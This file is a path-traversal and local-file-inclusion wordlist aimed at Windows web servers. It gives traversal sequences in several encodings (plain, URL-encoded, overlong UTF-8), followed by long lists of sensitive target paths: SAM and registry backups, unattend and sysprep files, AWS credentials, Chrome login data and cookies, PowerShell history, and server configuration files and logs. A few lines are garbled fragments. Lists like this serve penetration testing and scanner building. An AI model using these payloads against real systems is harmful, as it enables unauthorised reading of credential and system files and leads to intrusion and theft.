/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\…..\\\…..\\\…..\\\
%2e%2e%2f%2e%2e%2fwindows/win.ini
%2e%2e%2f/%2e%2e%2f/%2e%2e%2f/%2e%2e%2f/%2e%2e%2f/boot.ini
..\%2e%2e%2f..\%2e%2e%2fboot.ini
..\%2e%2e%2f..\%2e%2e%2f..\%2e%2e%2f..\%2e%2e%2fboot.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows/win.ini
%c0%ae%c0%ae%c0%af/%c0%ae%c0%ae%c0%af/%c0%ae%c0%ae%c0%af/%c0%ae%c0%ae%c0%af/%c0%ae%c0%ae%c0%af/boot.ini
..\%c0%ae%c0%ae%c0%af..\%c0%ae%c0%ae%c0%afboot.ini
..\%c0%ae%c0%ae%c0%af..\%c0%ae%c0%ae%c0%af..\%c0%ae%c0%ae%c0%af..\%c0%ae%c0%ae%c0%afboot.ini
..%c0%5c../..%c0%5c../boot.ini
..%c0%5c../..%c0%5c../..%c0%5c../..%c0%5c../boot.ini
%c0%5c…..%c0%5c%c0%5c%c0%5c…..%c0%5c%c0%5c%c0%5c…..%c0%5c%c0%5c%c0%5c
d:%c0%5cAppServ%c0%5cMySQL
c:%c0%5cAppServ%c0%5cMySQL
C:%c0%5cProgram Files%c0%5c
D:%c0%5cProgram Files%c0%5c
=3D “/..” . “%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log 
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err 
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log 
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf 
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf 
C:/Program Files (x86)/Apache Group/Apache/conf/access.log 
C:/Program Files (x86)/Apache Group/Apache/conf/error.log 
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml 
C:/Program Files (x86)/xampp/apache/conf/httpd.conf 
C:/WINDOWS/php.ini C:/WINDOWS/Repair/SAM 
C:/Windows/repair/system C:/Windows/repair/software 
C:/Windows/repair/security 
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini 
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log 
C:/xampp/apache/logs/error.log 
C:/Windows/Panther/Unattend/Unattended.xml 
C:/Windows/Panther/Unattended.xml 
C:/Windows/debug/NetSetup.log 
C:/Windows/system32/config/AppEvent.Evt 
C:/Windows/system32/config/SecEvent.Evt 
C:/Windows/system32/config/default.sav 
C:/Windows/system32/config/security.sav 
C:/Windows/system32/config/software.sav 
C:/Windows/system32/config/system.sav 
C:/Windows/system32/config/regback/default 
C:/Windows/system32/config/regback/sam 
C:/Windows/system32/config/regback/security 
C:/Windows/system32/config/regback/system 
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini 
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml 
C:/Windows/System32/inetsrv/config/applicationHost.config 
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
%2F..\..\..\..\..\..\winnt\win.ini
..%2F..%2Fwindows%2Fwin.ini
..%2F%2F..%2F%2F..%2F%2F..%2F%2F..%2F%2Fboot.ini
..\..%2F..\..%2Fboot.ini
..\..%2F..\..%2F..\..%2F..\..%2Fboot.ini
\…..\\\…..\\\…..\\\
=3D “%2F..” . “%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS%2Fsystem32%2F
%2FC:\Program Files\
%2FD:\Program Files\
%2FC:%2Finetpub%2Fftproot%2F
C:%2FUsers%2FAdministrator%2FNTUser.dat
C:%2FDocuments and Settings%2FAdministrator%2FNTUser.dat
C:%2Fapache%2Flogs%2Faccess.log
C:%2Fapache%2Flogs%2Ferror.log
C:%2Fapache%2Fphp%2Fphp.ini
C:%2Fboot.ini
C:%2Finetpub%2Fwwwroot%2Fglobal.asa
C:%2FMySQL%2Fdata%2Fhostname.err
C:%2FMySQL%2Fdata%2Fmysql.err
C:%2FMySQL%2Fdata%2Fmysql.log
C:%2FMySQL%2Fmy.cnf
C:%2FMySQL%2Fmy.ini
C:%2Fphp4%2Fphp.ini
C:%2Fphp5%2Fphp.ini
C:%2Fphp%2Fphp.ini
C:%2FProgram Files%2FApache Group%2FApache2%2Fconf%2Fhttpd.conf
C:%2FProgram Files%2FApache Group%2FApache%2Fconf%2Fhttpd.conf
C:%2FProgram Files%2FApache Group%2FApache%2Flogs%2Faccess.log
C:%2FProgram Files%2FApache Group%2FApache%2Flogs%2Ferror.log
C:%2FProgram Files%2FFileZilla Server%2FFileZilla Server.xml
C:%2FProgram Files%2FMySQL%2Fdata%2Fhostname.err
C:%2FProgram Files%2FMySQL%2Fdata%2Fmysql-bin.log
C:%2FProgram Files%2FMySQL%2Fdata%2Fmysql.err
C:%2FProgram Files%2FMySQL%2Fdata%2Fmysql.log
C:%2FProgram Files%2FMySQL%2Fmy.ini
C:%2FProgram Files%2FMySQL%2Fmy.cnf
C:%2FProgram Files%2FMySQL%2FMySQL Server 5.0%2Fdata%2Fhostname.err
C:%2FProgram Files%2FMySQL%2FMySQL Server 5.0%2Fdata%2Fmysql-bin.log 
C:%2FProgram Files%2FMySQL%2FMySQL Server 5.0%2Fdata%2Fmysql.err 
C:%2FProgram Files%2FMySQL%2FMySQL Server 5.0%2Fdata%2Fmysql.log 
C:%2FProgram Files%2FMySQL%2FMySQL Server 5.0%2Fmy.cnf
C:%2FProgram Files%2FMySQL%2FMySQL Server 5.0%2Fmy.ini
C:%2FProgram Files (x86)%2FApache Group%2FApache2%2Fconf%2Fhttpd.conf 
C:%2FProgram Files (x86)%2FApache Group%2FApache%2Fconf%2Fhttpd.conf 
C:%2FProgram Files (x86)%2FApache Group%2FApache%2Fconf%2Faccess.log 
C:%2FProgram Files (x86)%2FApache Group%2FApache%2Fconf%2Ferror.log 
C:%2FProgram Files (x86)%2FFileZilla Server%2FFileZilla Server.xml 
C:%2FProgram Files (x86)%2Fxampp%2Fapache%2Fconf%2Fhttpd.conf 
C:%2FWINDOWS%2Fphp.ini C:%2FWINDOWS%2FRepair%2FSAM 
C:%2FWindows%2Frepair%2Fsystem C:%2FWindows%2Frepair%2Fsoftware 
C:%2FWindows%2Frepair%2Fsecurity 
C:%2FWINDOWS%2FSystem32%2Fdrivers%2Fetc%2Fhosts
C:%2FWindows%2Fwin.ini 
C:%2FWINNT%2Fphp.ini
C:%2FWINNT%2Fwin.ini
C:%2Fxampp%2Fapache%2Fbin%2Fphp.ini
C:%2Fxampp%2Fapache%2Flogs%2Faccess.log 
C:%2Fxampp%2Fapache%2Flogs%2Ferror.log 
C:%2FWindows%2FPanther%2FUnattend%2FUnattended.xml 
C:%2FWindows%2FPanther%2FUnattended.xml 
C:%2FWindows%2Fdebug%2FNetSetup.log 
C:%2FWindows%2Fsystem32%2Fconfig%2FAppEvent.Evt 
C:%2FWindows%2Fsystem32%2Fconfig%2FSecEvent.Evt 
C:%2FWindows%2Fsystem32%2Fconfig%2Fdefault.sav 
C:%2FWindows%2Fsystem32%2Fconfig%2Fsecurity.sav 
C:%2FWindows%2Fsystem32%2Fconfig%2Fsoftware.sav 
C:%2FWindows%2Fsystem32%2Fconfig%2Fsystem.sav 
C:%2FWindows%2Fsystem32%2Fconfig%2Fregback%2Fdefault 
C:%2FWindows%2Fsystem32%2Fconfig%2Fregback%2Fsam 
C:%2FWindows%2Fsystem32%2Fconfig%2Fregback%2Fsecurity 
C:%2FWindows%2Fsystem32%2Fconfig%2Fregback%2Fsystem 
C:%2FWindows%2Fsystem32%2Fconfig%2Fregback%2Fsoftware
C:%2FProgram Files%2FMySQL%2FMySQL Server 5.1%2Fmy.ini 
C:%2FWindows%2FSystem32%2Finetsrv%2Fconfig%2Fschema%2FASPNET_schema.xml 
C:%2FWindows%2FSystem32%2Finetsrv%2Fconfig%2FapplicationHost.config 
C:%2Finetpub%2Flogs%2FLogFiles%2FW3SVC1%2Fu_ex[YYMMDD].log
c:/$recycle.bin/s-1-5-18/desktop.ini
c:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
c:/apache/log/access.log
c:/apache/log/access_log
c:/apache/log/error.log
c:/apache/log/error_log
c:/apache/logs/access.log
c:/apache/logs/access_log
c:/apache/logs/error.log
c:/apache/logs/error_log
c:/apache/php/php.ini
c:/apache2/log/access.log
c:/apache2/log/access_log
c:/apache2/log/error.log
c:/apache2/log/error_log
c:/apache2/logs/access.log
c:/apache2/logs/access_log
c:/apache2/logs/error.log
c:/apache2/logs/error_log
c:/boot.ini
c:/documents and settings/administrator/desktop/desktop.ini
c:/documents and settings/administrator/ntuser.dat
c:/documents and settings/administrator/ntuser.ini
c:/home/bin/stable/apache/php.ini
c:/home2/bin/stable/apache/php.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/Site.master
c:/inetpub/wwwroot/app_start/bundleconfig.cs
c:/inetpub/wwwroot/app_start/filterconfig.cs
c:/inetpub/wwwroot/app_start/routeconfig.cs
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/global.asax
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/packages.config
c:/inetpub/wwwroot/web.config
c:/log/access.log
c:/log/access_log
c:/log/error.log
c:/log/error_log
c:/log/httpd/access_log
c:/log/httpd/error_log
c:/logs/access.log
c:/logs/access_log
c:/logs/error.log
c:/logs/error_log
c:/logs/httpd/access_log
c:/logs/httpd/error_log
c:/mysql/bin/my.ini
c:/mysql/data/hostname.err
c:/mysql/data/mysql.err
c:/mysql/data/mysql.log
c:/mysql/my.cnf
c:/mysql/my.ini
c:/opt/xampp/logs/access.log
c:/opt/xampp/logs/access_log
c:/opt/xampp/logs/error.log
c:/opt/xampp/logs/error_log
c:/php/php.ini
c:/php/sessions/
c:/php4/php.ini
c:/php4/sessions/
c:/php5/php.ini
c:/php5/sessions/
c:/program files (x86)/apache group/apache/conf/access.log
c:/program files (x86)/apache group/apache/conf/error.log
c:/program files (x86)/apache group/apache/conf/httpd.conf
c:/program files (x86)/apache group/apache/logs/access.log
c:/program files (x86)/apache group/apache/logs/error.log
c:/program files (x86)/apache group/apache2/conf/httpd.conf
c:/program files (x86)/filezilla server/filezilla server.xml
c:/program files (x86)/mysql/data/hostname.err
c:/program files (x86)/mysql/data/mysql-bin.log
c:/program files (x86)/mysql/data/mysql.err
c:/program files (x86)/mysql/data/mysql.log
c:/program files (x86)/mysql/my.cnf
c:/program files (x86)/mysql/my.ini
c:/program files (x86)/mysql/mysql server 5.0/data/hostname.err
c:/program files (x86)/mysql/mysql server 5.0/data/mysql-bin.log
c:/program files (x86)/mysql/mysql server 5.0/data/mysql.err
c:/program files (x86)/mysql/mysql server 5.0/data/mysql.log
c:/program files (x86)/mysql/mysql server 5.0/my.cnf
c:/program files (x86)/mysql/mysql server 5.0/my.ini
c:/program files (x86)/mysql/mysql server 5.1/my.ini
c:/program files (x86)/xampp/apache/conf/httpd.conf
c:/program files/apache group/apache/conf/access.log
c:/program files/apache group/apache/conf/error.log
c:/program files/apache group/apache/conf/httpd.conf
c:/program files/apache group/apache/logs/access.log
c:/program files/apache group/apache/logs/error.log
c:/program files/apache group/apache2/conf/httpd.conf
c:/program files/filezilla server/filezilla server.xml
c:/program files/mysql/data/hostname.err
c:/program files/mysql/data/mysql-bin.log
c:/program files/mysql/data/mysql.err
c:/program files/mysql/data/mysql.log
c:/program files/mysql/my.cnf
c:/program files/mysql/my.ini
c:/program files/mysql/mysql server 5.0/data/hostname.err
c:/program files/mysql/mysql server 5.0/data/mysql-bin.log
c:/program files/mysql/mysql server 5.0/data/mysql.err
c:/program files/mysql/mysql server 5.0/data/mysql.log
c:/program files/mysql/mysql server 5.0/my.cnf
c:/program files/mysql/mysql server 5.0/my.ini
c:/program files/mysql/mysql server 5.1/my.ini
c:/program files/xampp/apache/conf/httpd.conf
c:/programdata/mcafee/common framework/sitelist.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/users/administrator/.aws/config
c:/users/administrator/.aws/credentials
c:/users/administrator/.elasticbeanstalk/config
c:/users/administrator/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
c:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks
c:/users/administrator/appdata/local/google/chrome/user data/default/bookmarks.bak
c:/users/administrator/appdata/local/google/chrome/user data/default/cookies
c:/users/administrator/appdata/local/google/chrome/user data/default/history
c:/users/administrator/appdata/local/google/chrome/user data/default/last session
c:/users/administrator/appdata/local/google/chrome/user data/default/login data
c:/users/administrator/appdata/local/google/chrome/user data/default/preferences
c:/users/administrator/appdata/local/google/chrome/user data/default/secure preferences
c:/users/administrator/appdata/local/google/chrome/user data/default/top sites
c:/users/administrator/desktop/desktop.ini
c:/users/administrator/desktop/proof.txt
c:/users/administrator/ntuser.dat
c:/users/administrator/ntuser.ini
c:/windows/csc/v2.0.6/pq
c:/windows/csc/v2.0.6/sm
c:/windows/debug/netsetup.log
c:/windows/explorer.exe
c:/windows/iis5.log
c:/windows/iis6.log
c:/windows/iis7.log
c:/windows/iis8.log
c:/windows/notepad.exe
c:/windows/panther/setupinfo
c:/windows/panther/setupinfo.bak
c:/windows/panther/sysprep.inf
c:/windows/panther/sysprep.xml
c:/windows/panther/unattend.txt
c:/windows/panther/unattend.xml
c:/windows/panther/unattend/setupinfo
c:/windows/panther/unattend/setupinfo.bak
c:/windows/panther/unattend/sysprep.inf
c:/windows/panther/unattend/sysprep.xml
c:/windows/panther/unattend/unattend.txt
c:/windows/panther/unattend/unattend.xml
c:/windows/panther/unattend/unattended.txt
c:/windows/panther/unattend/unattended.xml
c:/windows/panther/unattended.txt
c:/windows/panther/unattended.xml
c:/windows/php.ini
c:/windows/repair/sam
c:/windows/repair/security
c:/windows/repair/software
c:/windows/repair/system
c:/windows/system.ini
c:/windows/system32/config/appevent.evt
c:/windows/system32/config/default.sav
c:/windows/system32/config/regback/default
c:/windows/system32/config/regback/sam
c:/windows/system32/config/regback/security
c:/windows/system32/config/regback/software
c:/windows/system32/config/regback/system
c:/windows/system32/config/sam
c:/windows/system32/config/secevent.evt
c:/windows/system32/config/security.sav
c:/windows/system32/config/software.sav
c:/windows/system32/config/system
c:/windows/system32/config/system.sa
c:/windows/system32/config/system.sav
c:/windows/system32/drivers/etc/hosts
c:/windows/system32/eula.txt
c:/windows/system32/inetsrv/config/Administration.config
c:/windows/system32/inetsrv/config/Redirection.config
c:/windows/system32/inetsrv/config/applicationhost.config
c:/windows/system32/inetsrv/config/schema/aspnet_schema.xml
c:/windows/system32/license.rtf
c:/windows/system32/logfiles/httperr/httperr1.log
c:/windows/system32/sysprep.inf
c:/windows/system32/sysprep.xml
c:/windows/system32/sysprep/panther/unattend.xml
c:/windows/system32/sysprep/sysprep.xml
c:/windows/system32/sysprep/unattend.xml
c:/windows/system32/sysprepsysprep.inf
c:/windows/system32/sysprepsysprep.xml
c:/windows/system32/sysprepunattend.txt
c:/windows/system32/sysprepunattend.xml
c:/windows/system32/sysprepunattended.txt
c:/windows/system32/sysprepunattended.xml
c:/windows/system32/unattend.txt
c:/windows/system32/unattend.xml
c:/windows/system32/unattended.txt
c:/windows/system32/unattended.xml
c:/windows/temp/
c:/windows/win.ini
c:/windows/windowsupdate.log
c:/winnt/php.ini
c:/winnt/win.ini
c:/xampp/apache/bin/php.ini
c:/xampp/apache/conf/httpd.conf
c:/xampp/apache/logs/access.log
c:/xampp/apache/logs/error.log
c:/xampp/filezillaftp/filezilla server.xml
c:/xampp/filezillaftp/logs
c:/xampp/filezillaftp/logs/access.log
c:/xampp/filezillaftp/logs/error.log
c:/xampp/mercurymail/logs/access.log
c:/xampp/mercurymail/logs/error.log
c:/xampp/mercurymail/mercury.ini
c:/xampp/mysql/data/mysql.err
c:/xampp/php/php.ini
c:/xampp/phpmyadmin/config.inc
c:/xampp/phpmyadmin/config.inc.php
c:/xampp/phpmyadmin/phpinfo.php
c:/xampp/sendmail/sendmail.ini
c:/xampp/sendmail/sendmail.log
c:/xampp/tomcat/conf/tomcat-users.xml
c:/xampp/tomcat/conf/web.xml
c:/xampp/webalizer/webalizer.conf
c:/xampp/webdav/webdav.txt